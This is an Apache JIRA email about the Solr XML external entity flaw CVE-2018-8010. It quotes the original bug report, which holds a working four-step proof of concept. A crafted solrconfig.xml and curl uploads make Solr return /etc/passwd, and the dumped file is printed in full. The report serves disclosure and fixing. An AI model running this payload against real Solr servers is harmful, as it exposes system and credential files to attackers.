[
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482426#comment-16482426
]
ASF subversion and git services commented on SOLR-12316:
--------------------------------------------------------
Commit f08c6b1ef149b4a7ca63c68c9fde3ccb14d39e6a in lucene-solr's branch
refs/heads/branch_7x from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=f08c6b1 ]
SOLR-12316: Make CVE public
# Conflicts:
# solr/CHANGES.txt
> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> ---------------------------------------------------------------------
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
> Issue Type: Bug
> Security Level: Public(Default Security Level. Issues are Public)
> Affects Versions: 5.5.5, 6.6.3, 7.3
> Reporter: Ishan Chattopadhyaya
> Assignee: Uwe Schindler
> Priority: Blocker
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch,
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch,
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he
> was able to successfully achieve that using XXE. That alarmed me! Our
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload
> functionality:
> Step 1: Create a configset with just two files in a directory called
> "minimal":
> schema.xml:
> {code}
> <schema name="minimal" version="1.1">
> <fieldType name="string" class="solr.StrField"/>
> <dynamicField name="*" type="string" indexed="true" stored="true"/>
> </schema>
> {code}
> solrconfig.xml
> {code}
> <?xml version="1.0" ?>
> <!DOCTYPE doc [
> <!ENTITY passwdFile SYSTEM "file:///etc/passwd">
> ]>
> <config>
> <dataDir>${solr.data.dir:}</dataDir>
> <directoryFactory name="DirectoryFactory"
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
> <schemaFactory class="ClassicIndexSchemaFactory"/>
> <luceneMatchVersion>7.3.0</luceneMatchVersion>
> <updateHandler class="solr.DirectUpdateHandler2">
> <commitWithin>
> <softCommit>${solr.commitwithin.softcommit:true}</softCommit>
> </commitWithin>
> </updateHandler>
> <requestHandler name="/select" class="solr.SearchHandler">
> <lst name="defaults">
> <str name="echoParams">explicit</str>
> <str name="indent">true</str>
> <str name="df">text</str>
> <str name="password">&passwdFile;</str>
> </lst>
> </requestHandler>
> </config>
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header
> "Content-Type:application/octet-stream" --data-binary @-
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
> adding: schema.xml (deflated 42%)
> adding: solrconfig.xml (deflated 50%)
> {
> "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
> "responseHeader":{
> "status":0,
> "QTime":3431},
> "success":{
> "192.168.1.6:8983_solr":{
> "responseHeader":{
> "status":0,
> "QTime":2062},
> "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is
> revealed!
> {code}
> [ishan@x260 solr] $ curl
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
> % Total % Received % Xferd Average Speed Time Time Time
> Current
> Dload Upload Total Spent Left Speed
> 100 7939 100 7939 0 0 7939 0 0:00:01 --:--:-- 0:00:01 323k
> {
> "responseHeader": {
> "status": 0,
> "QTime": 16
> },
> "config": {
> "requestHandler": {
> "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
> "echoParams": "explicit",
> "indent": "true",
> "df": "text",
> "password":
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
> Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
> System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
> Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd
> user:/:/sbin/nologin\nradvd:x:75:75:radvd
> user:/:/sbin/nologin\nqemu:x:107:107:qemu
> user:/:/sbin/nologin\napache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin\ncolord:x:995:990:User
> for
> colord:/var/lib/colord:/sbin/nologin\nabrt:x:173:173::/etc/abrt:/sbin/nologin\nsaslauth:x:994:76:Saslauthd
>
> user:/run/saslauthd:/sbin/nologin\nopenvpn:x:993:988:OpenVPN:/etc/openvpn:/sbin/nologin\nnm-openvpn:x:992:987:Default
> user for running openvpn spawned by
> NetworkManager:/:/sbin/nologin\ngdm:x:42:42::/var/lib/gdm:/sbin/nologin\nsetroubleshoot:x:991:985::/var/lib/setroubleshoot:/sbin/nologin\nrpcuser:x:29:29:RPC
> Service User:/var/lib/nfs:/sbin/nologin\nnfsnobody:x:65534:65534:Anonymous
> NFS User:/var/lib/nfs:/sbin/nologin\nnm-openconnect:x:990:984:NetworkManager
> user for
> OpenConnect:/:/sbin/nologin\ngnome-initial-setup:x:989:983::/run/gnome-initial-setup/:/sbin/nologin\nsshd:x:74:74:Privilege-separated
> SSH:/var/empty/sshd:/sbin/nologin\ntss:x:59:59:Account used by the trousers
> package to sandbox the tcsd
> daemon:/dev/null:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\nishan:x:1000:1000:Ishan
> Chattopadhyaya:/home/ishan:/bin/bash\nsystemd-coredump:x:982:982:systemd
> Core Dumper:/:/sbin/nologin\nakmods:x:981:981:User is used by akmods to build
> akmod packages:/var/cache/akmods/:/sbin/nologin\nkube:x:980:978:Kubernetes
> user:/:/sbin/nologin\nzookeeper:x:979:977:ZooKeeper service
> account:/var/lib/zookeeper:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nautossh:x:977:975:autossh
> service account:/etc/autossh:/usr/sbin/nologin\nnginx:x:976:974:Nginx web
> server:/var/lib/nginx:/sbin/nologin\ngluster:x:975:972:GlusterFS
> daemons:/run/gluster:/sbin/nologin\npipewire:x:974:971:PipeWire System
> Daemon:/var/run/pipewire:/sbin/nologin\nunbound:x:973:970:Unbound DNS
> resolver:/etc/unbound:/sbin/nologin\nnetdata:x:972:969:NetData
> User:/var/lib/netdata:/sbin/nologin\ndnsmasq:x:967:967:Dnsmasq DHCP and DNS
> server:/var/lib/dnsmasq:/sbin/nologin\n"
> }
> {code}
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
